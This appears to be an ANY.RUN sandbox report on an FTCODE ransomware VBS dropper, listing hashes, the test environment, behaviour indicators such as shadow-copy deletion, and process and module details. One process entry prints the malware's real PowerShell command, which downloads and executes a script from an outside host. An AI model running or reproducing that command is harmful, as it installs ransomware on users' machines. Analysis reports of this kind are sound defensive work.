General Info

File name

Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs

Full analysis
https://app.any.run/tasks/dc24154a-36f3-4fac-a596-a4c5d8c96b2a
Verdict
Malicious activity
Analysis date
10/9/2019, 16:13:18
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:

trojan

ransomware

ftcode

Indicators:

MIME:
text/plain
File info:
ASCII text, with CRLF, LF line terminators
MD5

be611918fabc12048aeba6e55f6559d7

SHA1

4cb525212460fedae4820a7cfc39e47db48c4c7b

SHA256

07c226d6e4ab84a586b1a09f09896223412de927513fda6bf13b031dc497e686

SSDEEP

48:KudJXRRAiRESdFZyRkRR8IRHRQRJf8i+:tdJBRAyTZCYR8sxEJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
660 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
on
Network geolocation
IT
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 11.0.9600.18860 KB4052978
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • Adobe Flash Player 27 ActiveX (27.0.0.187)
  • Adobe Flash Player 27 NPAPI (27.0.0.187)
  • Adobe Flash Player 27 PPAPI (27.0.0.187)
  • CCleaner (5.35)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Professional 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Single Image 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
  • Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
  • Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x64 en-US) (67.0.4)
  • Mozilla Maintenance Service (67.0.4)
  • Notepad++ (64-bit x64) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype™ 7.39 (7.39.102)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Hyphenation Parent Package English
  • IE Spelling Parent Package English
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • InternetExplorer Package TopLevel
  • KB2479943
  • KB2491683
  • KB2506014
  • KB2506212
  • KB2506928
  • KB2509553
  • KB2532531
  • KB2533552
  • KB2534111
  • KB2545698
  • KB2547666
  • KB2552343
  • KB2560656
  • KB2563227
  • KB2564958
  • KB2579686
  • KB2585542
  • KB2585542 SP1
  • KB2598845
  • KB2603229
  • KB2604115
  • KB2620704
  • KB2621440
  • KB2631813
  • KB2640148
  • KB2653956
  • KB2654428
  • KB2656356
  • KB2656356 SP1
  • KB2660075
  • KB2667402
  • KB2685811
  • KB2685813
  • KB2685939
  • KB2690533
  • KB2698365
  • KB2705219
  • KB2706045
  • KB2719857
  • KB2726535
  • KB2727528
  • KB2729094
  • KB2729452
  • KB2732059
  • KB2732487
  • KB2736422
  • KB2742599
  • KB2750841
  • KB2758857
  • KB2761217
  • KB2763523
  • KB2770660
  • KB2773072
  • KB2786081
  • KB2789645
  • KB2789645 SP1
  • KB2791765
  • KB2799926
  • KB2800095
  • KB2807986
  • KB2808679
  • KB2813430
  • KB2834140
  • KB2836942
  • KB2836943
  • KB2840631
  • KB2843630
  • KB2847927
  • KB2852386
  • KB2853952
  • KB2861698
  • KB2862152
  • KB2862330
  • KB2862335
  • KB2864202
  • KB2868038
  • KB2871997
  • KB2884256
  • KB2888049
  • KB2891804
  • KB2892074
  • KB2893294
  • KB2893519
  • KB2894844
  • KB2900986
  • KB2908783
  • KB2911501
  • KB2912390
  • KB2918077
  • KB2919469
  • KB2931356
  • KB2937610
  • KB2943357
  • KB2952664
  • KB2966583
  • KB2968294
  • KB2970228
  • KB2972100
  • KB2972211
  • KB2973112
  • KB2973201
  • KB2973351
  • KB2977292
  • KB2978120
  • KB2978742
  • KB2984972
  • KB2985461
  • KB2991963
  • KB2992611
  • KB3003743
  • KB3004361
  • KB3004375
  • KB3006121
  • KB3006137
  • KB3010788
  • KB3011780
  • KB3013531
  • KB3019978
  • KB3020370
  • KB3021674
  • KB3021917
  • KB3022777
  • KB3023215
  • KB3030377
  • KB3031432
  • KB3035126
  • KB3035132
  • KB3037574
  • KB3042058
  • KB3045685
  • KB3046017
  • KB3046269
  • KB3054476
  • KB3055642
  • KB3059317
  • KB3060716
  • KB3067903
  • KB3068708
  • KB3071756
  • KB3072305
  • KB3074543
  • KB3075220
  • KB3076895
  • KB3078601
  • KB3078667
  • KB3080149
  • KB3084135
  • KB3086255
  • KB3092601
  • KB3092627
  • KB3093513
  • KB3097989
  • KB3101722
  • KB3107998
  • KB3108371
  • KB3108381
  • KB3108664
  • KB3109103
  • KB3109560
  • KB3110329
  • KB3115858
  • KB3115858 SP1
  • KB3122648
  • KB3124275
  • KB3126587
  • KB3127220
  • KB3133977
  • KB3137061
  • KB3138378
  • KB3138612
  • KB3138910
  • KB3139398
  • KB3139914
  • KB3140245
  • KB3147071
  • KB3150220
  • KB3155178
  • KB3156016
  • KB3156019
  • KB3159398
  • KB3161102
  • KB3161949
  • KB3161958
  • KB3170735
  • KB3170735 SP1
  • KB3172605
  • KB3177467
  • KB3179573
  • KB3184143
  • KB4019990
  • KB4040980
  • KB976902
  • KB982018
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • Package 1 for KB2656356
  • Package 1 for KB2789645
  • Package 1 for KB3115858
  • Package 1 for KB3170735
  • Package 2 for KB2585542
  • Package 2 for KB2656356
  • Package 2 for KB2789645
  • Package 2 for KB3115858
  • Package 2 for KB3170735
  • Package 3 for KB2585542
  • Package 3 for KB2656356
  • Package 4 for KB2656356
  • Package 4 for KB2789645
  • Package 5 for KB2656356
  • Package 7 for KB2656356
  • PlatformUpdate Win7 SRV08R2 Package TopLevel
  • ProfessionalEdition
  • RollupFix
  • UltimateEdition
  • WUClient SelfUpdate ActiveX
  • WUClient SelfUpdate Aux TopLevel
  • WUClient SelfUpdate Core TopLevel

Behavior activities

MALICIOUS SUSPICIOUS INFO
Uses Task Scheduler to run other applications
  • powershell.exe (PID: 2744)
  • powershell.exe (PID: 2460)
Loads the Task Scheduler COM API
  • schtasks.exe (PID: 1452)
  • mmc.exe (PID: 2360)
  • schtasks.exe (PID: 2120)
Renames files like Ransomware
  • powershell.exe (PID: 2460)
FTCODE was detected
  • powershell.exe (PID: 2460)
Starts BCDEDIT.EXE to disable recovery
  • cmd.exe (PID: 2888)
Deletes shadow copies
  • cmd.exe (PID: 1576)
  • cmd.exe (PID: 2716)
Writes to a start menu file
  • powershell.exe (PID: 2460)
Reads the machine GUID from the registry
  • powershell.exe (PID: 2304)
  • WScript.exe (PID: 2980)
  • mmc.exe (PID: 2360)
  • powershell.exe (PID: 2744)
  • WScript.exe (PID: 2676)
  • vlc.exe (PID: 2296)
  • WScript.exe (PID: 2584)
  • powershell.exe (PID: 2460)
Executed via Task Scheduler
  • WScript.exe (PID: 2980)
  • WScript.exe (PID: 2676)
Creates files in the user directory
  • powershell.exe (PID: 2304)
  • powershell.exe (PID: 2744)
  • vlc.exe (PID: 2296)
  • powershell.exe (PID: 2460)
Executes PowerShell scripts
  • WScript.exe (PID: 2980)
  • WScript.exe (PID: 2676)
  • WScript.exe (PID: 2584)
Starts CMD.EXE for commands execution
  • powershell.exe (PID: 2460)
Creates files like Ransomware instruction
  • powershell.exe (PID: 2460)
Reads internet explorer settings
  • IEXPLORE.EXE (PID: 2944)
Adds / modifies Windows certificates
  • IEXPLORE.EXE (PID: 2944)
Manual execution by user
  • mmc.exe (PID: 2360)
  • mmc.exe (PID: 596)
  • iexplore.exe (PID: 1952)
  • SndVol.exe (PID: 1972)
Reads settings of System Certificates
  • iexplore.exe (PID: 1952)
  • powershell.exe (PID: 2460)
Changes settings of System certificates
  • IEXPLORE.EXE (PID: 2944)
Creates files in the user directory
  • iexplore.exe (PID: 1952)
Reads the machine GUID from the registry
  • iexplore.exe (PID: 1952)
Changes internet zones settings
  • iexplore.exe (PID: 1952)
Reads Internet Cache Settings
  • iexplore.exe (PID: 1952)
Dropped object may contain URL to Tor Browser
  • powershell.exe (PID: 2460)
Dropped object may contain TOR URL's
  • powershell.exe (PID: 2460)

Find more information about signature artifacts and mapping to the MITRE ATT&CK™ MATRIX in the full report

Static information

Video and screenshots

Processes

Total processes
77
Monitored processes
26
Malicious processes
4
Suspicious processes
2

Behavior graph

start wscript.exe no specs #STOP powershell.exe vlc.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs bcdedit.exe no specs cmd.exe no specs cmd.exe no specs bcdedit.exe no specs wbadmin.exe no specs cmd.exe no specs wbadmin.exe no specs wbadmin.exe no specs vssadmin.exe no specs sndvol.exe no specs iexplore.exe iexplore.exe mmc.exe no specs mmc.exe wscript.exe no specs powershell.exe schtasks.exe no specs wscript.exe no specs powershell.exe no specs
Specs description
Program did not start
Integrity level elevation
Task contains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has suspicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information


PID
2584
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll

PID
2460
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = $env:temp + '\ramst007.mp3';(New-Object Net.WebClient).DownloadFile('https://archive.org/download/RammsteinRammsteinMix/Cast_1_64kb.mp3',$a); Start-Process $a;iex ((New-Object Net.WebClient).DownloadString('http://ceco.myheritageins.com/?need=streetm&vid=vbs4&4643'));
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuration\a2571a4e32a586b52463d88a83702aed\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\credssp.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\program files\videolan\vlc\vlc.exe
c:\windows\system32\schtasks.exe
c:\windows\system32\sxs.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.security\9ce308135fc7c9d6f24c6f8f66fad6f0\system.security.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.web\89d278aee76905ee8d74787e3d970e98\system.web.ni.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\microsoft.net\framework64\v2.0.50727\wminet_utils.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
2296
CMD
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\admin\AppData\Local\Temp\ramst007.mp3"
Path
C:\Program Files\VideoLAN\VLC\vlc.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
VideoLAN
Description
VLC media player
Version
2.2.6
Modules
Image
c:\program files\videolan\vlc\vlc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\videolan\vlc\libvlc.dll
c:\program files\videolan\vlc\libvlccore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winmm.dll
c:\program files\videolan\vlc\plugins\access\libdshow_plugin.dll
c:\windows\system32\oleaut32.dll
c:\program files\videolan\vlc\plugins\audio_output\libdirectsound_plugin.dll
c:\program files\videolan\vlc\plugins\audio_output\libwaveout_plugin.dll
c:\program files\videolan\vlc\plugins\video_output\libdirect3d_plugin.dll
c:\program files\videolan\vlc\plugins\video_output\libdirectdraw_plugin.dll
c:\windows\system32\dsound.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\program files\videolan\vlc\plugins\control\libwin_msg_plugin.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\uxtheme.dll
c:\program files\videolan\vlc\plugins\control\libhotkeys_plugin.dll
c:\program files\videolan\vlc\plugins\control\libwin_hotkeys_plugin.dll
c:\program files\videolan\vlc\plugins\access\libvdr_plugin.dll
c:\program files\videolan\vlc\plugins\access\libfilesystem_plugin.dll
c:\program files\videolan\vlc\plugins\gui\libqt4_plugin.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\wsock32.dll
c:\program files\videolan\vlc\plugins\stream_filter\libsmooth_plugin.dll
c:\program files\videolan\vlc\plugins\stream_filter\libhttplive_plugin.dll
c:\program files\videolan\vlc\plugins\stream_filter\libdash_plugin.dll
c:\program files\videolan\vlc\plugins\access\libzip_plugin.dll
c:\program files\videolan\vlc\plugins\access\librar_plugin.dll
c:\program files\videolan\vlc\plugins\stream_filter\librecord_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libes_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libtheora_plugin.dll
c:\program files\videolan\vlc\plugins\codec\librawvideo_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libspeex_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libvorbis_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libaes3_plugin.dll
c:\program files\videolan\vlc\plugins\codec\liblpcm_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_h264_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_flac_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_dirac_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mlp_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_vc1_plugin.dll
c:\windows\system32\userenv.dll
c:\program files\videolan\vlc\plugins\codec\libsvcdsub_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libspudec_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libcvdsub_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_hevc_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libavcodec_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libmpeg_audio_plugin.dll
c:\program files\videolan\vlc\plugins\meta_engine\libtaglib_plugin.dll
c:\program files\videolan\vlc\plugins\lua\liblua_plugin.dll
c:\program files\videolan\vlc\plugins\meta_engine\libfolder_plugin.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\videolan\vlc\plugins\access\liblibbluray_plugin.dll
c:\program files\videolan\vlc\plugins\access\libaccess_bd_plugin.dll
c:\program files\videolan\vlc\plugins\access\libdvdnav_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libmp4_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libavi_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libasf_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libflacsys_plugin.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\program files\videolan\vlc\plugins\codec\libjpeg_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libcdg_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libpng_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libschroedinger_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libdts_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libaraw_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libsubstx3g_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libflac_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libg711_plugin.dll
c:\program files\videolan\vlc\plugins\codec\liblibass_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libfaad_plugin.dll
c:\program files\videolan\vlc\plugins\codec\liba52_plugin.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\audioses.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\program files\videolan\vlc\plugins\audio_mixer\libfloat_mixer_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libscaletempo_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libmpgatofixed32_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libdtstofloat32_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\liba52tofloat32_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libsamplerate_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libsimple_channel_mixer_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\liba52tospdif_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libdtstospdif_plugin.dll
